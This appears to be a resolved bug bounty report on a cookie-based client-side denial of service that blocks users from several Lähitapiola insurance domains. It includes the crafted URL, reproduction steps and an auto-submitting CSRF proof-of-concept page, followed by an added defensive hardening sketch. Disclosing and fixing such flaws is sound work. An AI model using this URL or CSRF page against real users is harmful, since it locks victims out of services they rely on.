Cookie-based client-side denial-of-service to all of the Lähitapiola domains
Vulnerability Details
Time of detection: 23.2.2016 03:00-04:00
Affected URL: https://www.lahitapiola.fi/cs/Satellite?pagename=LahiTapiola/LTStatus&cookieName=selectedArea&cookieValue=1&backurl=http://www.lahitapiola.fi
## Description:
After the victim opens the affected URL (directly or via CSRF), the victim cannot access any of the Tapiola domains (see the list below).
The vulnerability affects anonymous AND authenticated users.
This full client-side denial-of-service lasts until the "selectedArea" cookie expires, which is about 10 years from the last login. The customer can recover from the condition by deleting the "selectedArea" cookie.
## List of domains which cannot be used by the client:
- www.tapiola.fi
- www.lahitapiola.fi
- verkkopalvelu.tapiola.fi
- yrityspalvelu.tapiola.fi
## Steps to reproduce:
1. Navigate either directly or via a CSRF attack to the following URL:
   - https://www.lahitapiola.fi/cs/Satellite?pagename=LahiTapiola/LTStatus&cookieName=selectedArea&cookieValue=1&backurl=http://www.lahitapiola.fi
2. Try to open www.tapiola.fi and notice that a white screen is returned.
3. Try to open www.lahitapiola.fi and notice that a white screen is returned.
4. Try to open verkkopalvelu.tapiola.fi and notice that a white screen is returned.
5. Try to open yrityspalvelu.tapiola.fi and notice that a white screen is returned.
6. Delete browser cookies and notice that you can now browse the Lähitapiola website normally.
## CSRF proof-of-concept:
```html
<html>
  <body>
    <form action="https://www.lahitapiola.fi/cs/Satellite">
      <input type="hidden" name="pagename" value="LahiTapiola/LTStatus" />
      <input type="hidden" name="cookieName" value="selectedArea" />
      <input type="hidden" name="cookieValue" value="1" />
      <input type="hidden" name="backurl" value="http://www.lahitapiola.fi" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```
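A server-side hardening sketch for this class of issue, added here as an example; it is not part of the original report and not Lähitapiola's code. It assumes the endpoint sets the cookie named by `cookieName` to `cookieValue`; the area names, the `req` object shape, the `csrfValid` flag and the cookie lifetime are hypothetical.

```javascript
// Hypothetical policy: which cookies the endpoint may set, and to which values.
const COOKIE_POLICY = new Map([
  ["selectedArea", new Set(["helsinki", "tampere", "oulu"])], // constructed values
]);
const DEFAULT_AREA = "helsinki";
const MAX_AGE = 30 * 24 * 3600; // bounded lifetime (assumption), in seconds

// Parse a Cookie request header into a Map, skipping malformed pairs.
function parseCookies(header) {
  const jar = new Map();
  for (const part of (header || "").split(";")) {
    const i = part.indexOf("=");
    if (i < 1) continue;
    try {
      jar.set(part.slice(0, i).trim(), decodeURIComponent(part.slice(i + 1).trim()));
    } catch (_) { /* bad percent-encoding: ignore this pair */ }
  }
  return jar;
}

// Write path: changing state needs POST plus a CSRF check, and only
// allowlisted name/value pairs are ever turned into a Set-Cookie header.
function handleSetCookie(req) {
  if (req.method !== "POST") return { status: 405, setCookie: null };
  if (!req.csrfValid) return { status: 403, setCookie: null }; // set by CSRF middleware (assumed)
  const allowed = COOKIE_POLICY.get(req.params.cookieName);
  if (!allowed || !allowed.has(req.params.cookieValue)) return { status: 400, setCookie: null };
  const c = `${req.params.cookieName}=${encodeURIComponent(req.params.cookieValue)}`;
  return { status: 200, setCookie: `${c}; Path=/; Max-Age=${MAX_AGE}; Secure; SameSite=Lax` };
}

// Read path: an unexpected value must never break rendering. Fall back to the
// default and expire the bad cookie so the browser recovers on its own.
function resolveArea(cookieHeader) {
  const raw = parseCookies(cookieHeader).get("selectedArea");
  if (raw === undefined) return { area: DEFAULT_AREA, setCookie: null };
  if (COOKIE_POLICY.get("selectedArea").has(raw)) return { area: raw, setCookie: null };
  // Path (and Domain, if one was used) must match the original cookie to clear it.
  return { area: DEFAULT_AREA, setCookie: "selectedArea=; Path=/; Max-Age=0" };
}
```

The read-path fallback matters independently of the write-path checks, because browsers that already hold an unexpected `selectedArea` value would otherwise stay locked out until the cookie expires.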
Report Stats
- Report ID: 129001
- State: Closed
- Substate: resolved
- Upvotes: 15